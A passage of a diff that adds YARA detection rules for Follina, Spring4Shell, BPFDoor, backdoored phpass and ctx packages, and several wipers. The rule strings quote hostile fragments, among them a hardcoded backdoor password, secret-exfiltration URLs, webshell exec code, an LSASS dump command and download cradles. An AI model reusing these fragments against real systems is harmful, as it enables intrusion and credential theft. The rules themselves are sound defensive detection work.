+      $x2 = "BGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADUALgAyAC4AMwA3ADkAMAAuADEAOAAzADAAIABiAHUAaQBsAHQAIABiAHkAOgAgAFcAaQBuAEQARABLAAAAAAAyAAkAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAGcAZAByAHYALgBzAHkAc" 
+      $x3 = "ARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAA1AC4AMgAuADMANwA5ADAALgAxADgAMwAwACAAYgB1AGkAbAB0ACAAYgB5ADoAIABXAGkAbgBEAEQASwAAAAAAMgAJAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABnAGQAcgB2AC4AcwB5AH" 
+   condition: 
+      filesize < 4000KB and 1 of them
+}
+
+rule VULN_Confluence_Questions_Plugin_CVE_2022_26138_Jul22_1_RID39F2 : CVE_2022_26138 DEMO EXPLOIT MAL VULN {
+   meta:
+      description = "Detects properties file of Confluence Questions plugin with static user name and password (backdoor) CVE-2022-26138"
+      author = "Florian Roth"
+      reference = "https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-confluence-hardcoded-credentials-flaw/"
+      date = "2022-07-21 19:25:31"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_26138, DEMO, EXPLOIT, MAL, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x_plain_1 = "predefined.user.password=disabled1system1user6708" 
+      $jar_marker = "/confluence/plugins/questions/" 
+      $jar_size_1 = { 00 CC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+      /*    here starts default.properties v                          */
+                      ?? ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74 2E 70
+                      72 6F 70 65 72 74 69 65 73 50 4B } 
+      $jar_size_2 = { 00 CC 00 ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74
+                      2E 70 72 6F 70 65 72 74 69 65 73 } 
+   condition: 
+      1 of ( $x* ) or ( $jar_marker and 1 of ( $jar_size* ) )
+}
+
+rule SUSP_ZIP_ISO_PhishAttachment_Pattern_Jun22_1_RID3719 : DEMO SUSP T1132 T1193 T1203 {
+   meta:
+      description = "Detects suspicious small base64 encoded ZIP files (MIME email attachments) with .iso files as content as often used in phishing attacks"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2022-06-23 17:24:01"
+      score = 65
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SUSP, T1132, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $pkzip_base64_1 = { 0A 55 45 73 44 42 } 
+      $pkzip_base64_2 = { 0A 55 45 73 44 42 } 
+      $pkzip_base64_3 = { 0A 55 45 73 48 43 } 
+      $iso_1 = "Lmlzb1BL" 
+      $iso_2 = "5pc29QS" 
+      $iso_3 = "uaXNvUE" 
+   condition: 
+      filesize < 2000KB and 1 of ( $pk* ) and 1 of ( $iso* )
+}
+
+rule SUSP_LNK_Follina_Jun22_RID2EB4 : CVE_2022_30190 DEMO EXPLOIT FILE SUSP T1023 T1210 {
+   meta:
+      description = "Detects LNK files with suspicious Follina / CVE-2022-30190 strings"
+      author = "Paul Hager"
+      reference = "https://twitter.com/gossithedog/status/1531650897905950727"
+      date = "2022-06-02 11:25:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, FILE, SUSP, T1023, T1210"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "msdt.exe" ascii wide
+      $sa2 = "msdt " ascii wide
+      $sa3 = "ms-msdt:" ascii wide
+      $sb = "IT_BrowseForFile=" ascii wide
+   condition: 
+      filesize < 5KB and uint16 ( 0 ) == 0x004c and uint32 ( 4 ) == 0x00021401 and 1 of ( $sa* ) and $sb
+}
+
+rule SUSP_Doc_RTF_OLE2Link_Jun22_RID300B : DEMO FILE SUSP {
+   meta:
+      description = "Detects a suspicious pattern in RTF files which downloads external resources"
+      author = "Christian Burkard"
+      reference = "Internal Research"
+      date = "2022-06-01 12:23:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $sa = "\\objdata" ascii nocase
+      $sb1 = "4f4c45324c696e6b" ascii
+      $sb2 = "4F4C45324C696E6B" ascii
+      $sc1 = "d0cf11e0a1b11ae1" ascii
+      $sc2 = "D0CF11E0A1B11AE1" ascii
+      $x1 = "68007400740070003a002f002f00" ascii
+      $x2 = "68007400740070003A002F002F00" ascii
+      $x3 = "680074007400700073003a002f002f00" ascii
+      $x4 = "680074007400700073003A002F002F00" ascii
+      $x5 = "6600740070003a002f002f00" ascii
+      $x6 = "6600740070003A002F002F00" ascii
+   condition: 
+      ( uint32be ( 0 ) == 0x7B5C7274 or uint32be ( 0 ) == 0x7B5C2A5C ) and $sa and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+}
+
+rule SUSP_Doc_RTF_OLE2Link_EMAIL_Jun22_RID31D2 : DEMO SUSP {
+   meta:
+      description = "Detects a suspicious pattern in RTF files which downloads external resources inside e-mail attachments"
+      author = "Christian Burkard"
+      reference = "Internal Research"
+      date = "2022-06-01 13:38:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "XG9iamRhdG" ascii
+      $sa2 = "xvYmpkYXRh" ascii
+      $sa3 = "cb2JqZGF0Y" ascii
+      $sb1 = "NGY0YzQ1MzI0YzY5NmU2Y" ascii
+      $sb2 = "RmNGM0NTMyNGM2OTZlNm" ascii
+      $sb3 = "0ZjRjNDUzMjRjNjk2ZTZi" ascii
+      $sb4 = "NEY0QzQ1MzI0QzY5NkU2Q" ascii
+      $sb5 = "RGNEM0NTMyNEM2OTZFNk" ascii
+      $sb6 = "0RjRDNDUzMjRDNjk2RTZC" ascii
+      $sc1 = "ZDBjZjExZTBhMWIxMWFlM" ascii
+      $sc2 = "QwY2YxMWUwYTFiMTFhZT" ascii
+      $sc3 = "kMGNmMTFlMGExYjExYWUx" ascii
+      $sc4 = "RDBDRjExRTBBMUIxMUFFM" ascii
+      $sc5 = "QwQ0YxMUUwQTFCMTFBRT" ascii
+      $sc6 = "EMENGMTFFMEExQjExQUUx" ascii
+      $x1 = "NjgwMDc0MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+      $x2 = "Y4MDA3NDAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+      $x3 = "2ODAwNzQwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+      $x4 = "NjgwMDc0MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+      $x5 = "Y4MDA3NDAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+      $x6 = "2ODAwNzQwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+      $x7 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzYTAwMmYwMDJmMD" ascii
+      $x8 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM2EwMDJmMDAyZjAw" ascii
+      $x9 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNhMDAyZjAwMmYwM" ascii
+      $x10 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzQTAwMkYwMDJGMD" ascii
+      $x11 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM0EwMDJGMDAyRjAw" ascii
+      $x12 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNBMDAyRjAwMkYwM" ascii
+      $x13 = "NjYwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+      $x14 = "Y2MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+      $x15 = "2NjAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+      $x16 = "NjYwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+      $x17 = "Y2MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+      $x18 = "2NjAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+   condition: 
+      filesize < 10MB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+}
+
+rule SUSP_DOC_RTF_ExternalResource_EMAIL_Jun22_RID357D : CVE_2022_30190 DEMO EXPLOIT SUSP {
+   meta:
+      description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina inside e-mail attachment"
+      author = "Christian Burkard"
+      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+      date = "2022-06-01 16:15:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sa1 = "PFJlbGF0aW9uc2hpcH" ascii
+      $sa2 = "xSZWxhdGlvbnNoaXBz" ascii
+      $sa3 = "8UmVsYXRpb25zaGlwc" ascii
+      $sb1 = "VGFyZ2V0TW9kZT0iRXh0ZXJuYWwi" ascii
+      $sb2 = "RhcmdldE1vZGU9IkV4dGVybmFsI" ascii
+      $sb3 = "UYXJnZXRNb2RlPSJFeHRlcm5hbC" ascii
+      $sc1 = "Lmh0bWwhI" ascii
+      $sc2 = "5odG1sIS" ascii
+      $sc3 = "uaHRtbCEi" ascii
+   condition: 
+      filesize < 400KB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+}
+
+rule SUSP_Msdt_Artefact_Jun22_2_RID305D : CVE_2022_30190 DEMO EXPLOIT FILE SUSP {
+   meta:
+      description = "Detects suspicious pattern in msdt diagnostics log (e.g. CVE-2022-30190)"
+      author = "Christian Burkard"
+      reference = "https://twitter.com/nas_bench/status/1531718490494844928"
+      date = "2022-06-01 12:36:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-07-29"
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, FILE, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<ScriptError><Data id=\"ScriptName\" name=\"Script\">TS_ProgramCompatibilityWizard.ps1" ascii
+      $x1 = "/../../" ascii
+      $x2 = "$(Invoke-Expression" ascii
+      $x3 = "$(IEX(" ascii nocase
+   condition: 
+      uint32 ( 0 ) == 0x6D783F3C and $a1 and 1 of ( $x* )
+}
+
+rule SUSP_PS1_Msdt_Execution_May22_RID3183 : CVE_2022_30190 DEMO EXPLOIT SCRIPT SUSP T1059_001 T1086 {
+   meta:
+      description = "Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation"
+      author = "Nasreddine Bencherchali, Christian Burkard"
+      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+      date = "2022-05-31 13:25:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-07-08"
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, SCRIPT, SUSP, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a = "PCWDiagnostic" ascii wide fullword
+      $sa1 = "msdt.exe" ascii wide
+      $sa2 = "msdt " ascii wide
+      $sa3 = "ms-msdt" ascii wide
+      $sb1 = "/af " ascii wide
+      $sb2 = "-af " ascii wide
+      $sb3 = "IT_BrowseForFile=" ascii wide
+      $fp1 = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00
+               46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00
+               00 00 70 00 63 00 77 00 72 00 75 00 6E 00 2E 00
+               65 00 78 00 65 00 } 
+      $fp2 = "FilesFullTrust" wide
+   condition: 
+      filesize < 10MB and $a and 1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* )
+}
+
+rule SUSP_Doc_WordXMLRels_May22_RID303D : CVE_2022_30190 DEMO EXPLOIT SUSP {
+   meta:
+      description = "Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation"
+      author = "Tobias Michalski, Christian Burkard, Wojciech Cieslak"
+      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+      date = "2022-05-30 12:31:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-06-20"
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, SUSP"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "<Relationships" ascii
+      $a2 = "TargetMode=\"External\"" ascii
+      $x1 = ".html!" ascii
+      $x2 = ".htm!" ascii
+      $x3 = "%2E%68%74%6D%6C%21" ascii
+      $x4 = "%2E%68%74%6D%21" ascii
+   condition: 
+      filesize < 50KB and all of ( $a* ) and 1 of ( $x* )
+}
+
+rule SUSP_Doc_RTF_ExternalResource_May22_RID33F0 : CVE_2022_30190 DEMO EXPLOIT FILE SUSP {
+   meta:
+      description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation"
+      author = "Tobias Michalski, Christian Burkard"
+      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+      date = "2022-05-30 15:09:11"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-05-31"
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, FILE, SUSP"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = " LINK htmlfile \"http" ascii
+      $s2 = ".html!\" " ascii
+   condition: 
+      uint32be ( 0 ) == 0x7B5C7274 and filesize < 300KB and all of them
+}
+
+rule EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22_RID384E : CVE_2022_30190 DEMO EXPLOIT MAL {
+   meta:
+      description = "Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation"
+      author = "Tobias Michalski, Christian Burkard"
+      reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+      date = "2022-05-30 18:15:31"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-07-18"
+      hash1 = "4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784"
+      hash2 = "778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07"
+      tags = "CVE_2022_30190, DEMO, EXPLOIT, MAL"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $re1 = /location\.href\s{0,20}=\s{0,20}"ms-msdt:/ 
+      $a1 = "%6D%73%2D%6D%73%64%74%3A%2F" ascii
+   condition: 
+      filesize > 3KB and filesize < 100KB and 1 of them
+}
+
+rule VULN_PHP_Hack_Backdoored_Phpass_May21_RID3477 : DEMO VULN {
+   meta:
+      description = "Detects backdoored PHP phpass version"
+      author = "Christian Burkard"
+      reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+      date = "2022-05-24 15:31:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
+   condition: 
+      filesize < 30KB and $x1
+}
+
+rule VULN_Python_Hack_Backdoored_Ctx_May21_RID34D1 : DEMO SCRIPT T1059_006 VULN {
+   meta:
+      description = "Detects backdoored python ctx version"
+      author = "Christian Burkard"
+      reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+      date = "2022-05-24 15:46:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
+      hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
+      hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
+      tags = "DEMO, SCRIPT, T1059_006, VULN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/" 
+   condition: 
+      filesize < 10KB and $x1
+}
+
+rule APT_MAL_LNX_RedMenshen_BPFDoor_Controller_May22_3_RID3892 : APT CHINA DEMO LINUX MAL {
+   meta:
+      description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+      author = "Florian Roth"
+      reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+      date = "2022-05-08 18:26:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
+      hash2 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
+      tags = "APT, CHINA, DEMO, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
+      $s2 = "/sbin/mingetty /dev" ascii fullword
+      $s3 = "pickup -l -t fifo -u" ascii fullword
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 200KB and 2 of them or all of them
+}
+
+rule APT_MAL_LNX_RedMenshen_BPFDoor_Controller_May22_2_RID3891 : APT CHINA DEMO LINUX MAL {
+   meta:
+      description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
+      author = "Florian Roth"
+      reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+      date = "2022-05-07 18:26:41"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+      hash2 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
+      hash3 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
+      tags = "APT, CHINA, DEMO, LINUX, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $opx1 = { 48 83 c0 0c 48 8b 95 e8 fe ff ff 48 83 c2 0c 8b 0a 8b 55 f0 01 ca 89 10 c9 } 
+      $opx2 = { 48 01 45 e0 83 45 f4 01 8b 45 f4 3b 45 dc 7c cd c7 45 f4 00 00 00 00 eb 2? 48 8b 05 ?? ?? 20 00 } 
+      $op1 = { 48 8d 14 c5 00 00 00 00 48 8b 45 d0 48 01 d0 48 8b 00 48 89 c7 e8 ?? ?? ff ff 48 83 c0 01 48 01 45 e0 } 
+      $op2 = { 89 c2 8b 85 fc fe ff ff 01 c2 8b 45 f4 01 d0 2d 7b cf 10 2b 89 45 f4 c1 4d f4 10 } 
+      $op3 = { e8 ?? d? ff ff 8b 45 f0 eb 12 8b 85 3c ff ff ff 89 c7 e8 ?? d? ff ff b8 ff ff ff ff c9 } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 100KB and 2 of ( $opx* ) or 4 of them
+}
+
+rule APT_MAL_LNX_RedMenshen_BPFDoor_Controller_May22_1_RID3890 : APT DEMO LINUX MAL T1146 {
+   meta:
+      description = "Detects unknown Linux implants (uploads from KR and MO)"
+      author = "Florian Roth"
+      reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+      date = "2022-05-05 18:26:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
+      hash2 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
+      hash3 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
+      tags = "APT, DEMO, LINUX, MAL, T1146"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[-] Connect failed." ascii fullword
+      $s2 = "export MYSQL_HISTFILE=" ascii fullword
+      $s3 = "udpcmd" ascii fullword
+      $s4 = "getshell" ascii fullword
+      $op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 } 
+      $op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? } 
+      $op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 } 
+      $op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee } 
+   condition: 
+      uint16 ( 0 ) == 0x457f and filesize < 80KB and 2 of them or 5 of them
+}
+
+rule EXPL_POC_SpringCore_0day_Indicators_Mar22_1_RID3695 : DEMO EXPLOIT SCRIPT T1033 {
+   meta:
+      description = "Detects indicators found after SpringCore exploitation attempts and in the POC script"
+      author = "Florian Roth"
+      reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+      date = "2022-03-30 17:02:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, SCRIPT, T1033"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di" 
+      $x2 = "?pwd=j&cmd=whoami" 
+      $x3 = ".getParameter(%22pwd%22)" 
+      $x4 = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7B" 
+   condition: 
+      1 of them
+}
+
+rule EXPL_POC_SpringCore_0day_Webshell_Mar22_1_RID35BB : DEMO EXPLOIT SCRIPT T1100 WEBSHELL {
+   meta:
+      description = "Detects webshell found after SpringCore exploitation attempts POC script"
+      author = "Florian Roth"
+      reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+      date = "2022-03-30 16:25:41"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, SCRIPT, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".getInputStream(); int a = -1; byte[] b = new byte[2048];" 
+      $x2 = "if(\"j\".equals(request.getParameter(\"pwd\")" 
+      $x3 = ".getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();" 
+   condition: 
+      filesize < 200KB and 1 of them
+}
+
+rule MAL_WIPER_CaddyWiper_Mar22_1_RID308F : DEMO EXE MAL {
+   meta:
+      description = "Detects CaddyWiper malware"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ESETresearch/status/1503436420886712321?s=20&t=xh8JK6fEmRIrnqO7Ih_PNg"
+      date = "2022-03-15 12:45:01"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1e87e9b5ee7597bdce796490f3ee09211df48ba1d11f6e2f5b255f05cc0ba176"
+      hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
+      hash3 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
+      tags = "DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { ff 55 94 8b 45 fc 50 ff 55 f8 8a 4d ba 88 4d ba 8a 55 ba 80 ea 01 } 
+      $op2 = { 89 45 f4 83 7d f4 00 74 04 eb 47 eb 45 6a 00 8d 95 1c ff ff ff 52 } 
+      $op3 = { 6a 20 6a 02 8d 4d b0 51 ff 95 68 ff ff ff 85 c0 75 0a e9 4e 02 00 00 } 
+      $op4 = { e9 67 01 00 00 83 7d f4 05 74 0a e9 5c 01 00 00 e9 57 01 00 00 8d 45 98 50 6a 20 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 50KB and 3 of them or all of them
+}
+
+rule MAL_WIPER_IsaacWiper_Mar22_1_RID308B : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects IsaacWiper malware"
+      author = "Florian Roth"
+      reference = "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/"
+      date = "2022-03-03 12:44:21"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033"
+      hash2 = "7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "C:\\ProgramData\\log.txt" wide fullword
+      $s2 = "Cleaner.dll" ascii fullword
+      $s3 = "-- system logical drive: " wide fullword
+      $s4 = "-- FAILED" wide fullword
+      $op1 = { 8b f1 80 3d b0 66 03 10 00 0f 85 96 00 00 00 33 c0 40 b9 a8 66 03 10 87 01 33 db } 
+      $op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 a2 c8 01 10 2b c1 6a 04 } 
+      $op3 = { 8d 4d f4 ff 75 08 e8 12 ff ff ff 68 88 39 03 10 8d 45 f4 50 e8 2d 1d 00 00 cc } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "a4b162717c197e11b76a4d9bc58ea25d" or 3 of them )
+}
+
+rule APT_UA_Hermetic_Wiper_Artefacts_Feb22_1_RID353D : APT DEMO MAL T1077 T1085 T1105 {
+   meta:
+      description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
+      author = "Florian Roth"
+      reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+      date = "2022-02-25 16:04:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL, T1077, T1085, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
+      $sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
+      $sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
+      $sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
+      $sx5 = "\\policydefinitions\\postgresql.exe" ascii wide
+      $sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
+      $sx7 = "powershell -exec bypass gp.ps1" ascii wide
+      $sx8 = "powershell -exec bypass -File link.ps1" ascii wide
+      $sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide
+      $sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
+      $sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
+      $sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
+      $fp1 = "<html" ascii
+   condition: 
+      1 of ( $sx* ) or all of ( $sa* ) and not 1 of ( $fp* )
+}
+
+rule APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1_RID3723 : APT DEMO MAL T1053_005 T1077 {
+   meta:
+      description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
+      author = "Florian Roth"
+      reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
+      date = "2022-02-25 17:25:41"
+      score = 85
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, MAL, T1053_005, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a0 = "<Task version=" ascii wide
+      $sa1 = "CSIDL_SYSTEM_DRIVE\\temp" ascii wide
+      $sa2 = "postgresql.exe 1> \\\\127.0.0.1\\ADMIN$" ascii wide
+      $sa3 = "cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE" ascii wide
+   condition: 
+      $a0 and 1 of ( $s* )
+}
+
+rule APT_CN_APT27_Compromised_Certficate_Jan22_1_RID3639 : APT CHINA DEMO G0027 MAL {
+   meta:
+      description = "Detects compromised certifcates used by APT27 malware"
+      author = "Florian Roth"
+      reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
+      date = "2022-01-29 16:46:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, CHINA, DEMO, G0027, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   condition: 
